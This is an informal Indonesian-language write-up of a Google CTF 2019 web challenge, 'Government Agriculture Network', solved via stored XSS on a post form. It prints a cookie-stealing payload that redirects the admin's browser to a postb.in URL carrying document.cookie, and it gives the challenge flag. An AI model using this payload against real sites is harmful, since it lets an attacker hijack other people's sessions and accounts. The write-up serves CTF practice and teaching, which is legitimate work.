Hallo gayn kembali lagi dengan gw Yukinoshita 47 yapp lanjutkan bermain Google CTF 2019 kali ini challenge nya Government Agriculture Network dengan kategori web berikut challenge nya.
langsung aja gw buka https://govagriculture.web.ctfcompetition.com dan diweb nya terdapat form posting konten
kemudian gw post asal asalan muncul lah seperti ini ya konfirmasi web nya itu ya post nya masuk dan nunggu admin untuk lihat post nya
kemudian gw buka postbin untuk membuat payload XSS nya karena disini gw mau inject payload XSS grab cookie admin web nya.
setelah itu gw membuat payload yang didapat url nya dari postbin
kemudian gw inject dengan kode payload <script>location.href="https://postb.in/1565680049167-8349444575142?cookie='+document.cookie;"</script> kemudian klik Submit
dan respons dari web nya adalah seperti ini nah sesuai dugaan gw web nya vuln XSS dan payload XSS grab cookie nya bekerja dengan baik wkwkwkwkwk.
dan flag nya adalah CTF{8aaa2f34b392b415601804c2f5f0f24e}
dan tentu saja solved wkwkwkwk/
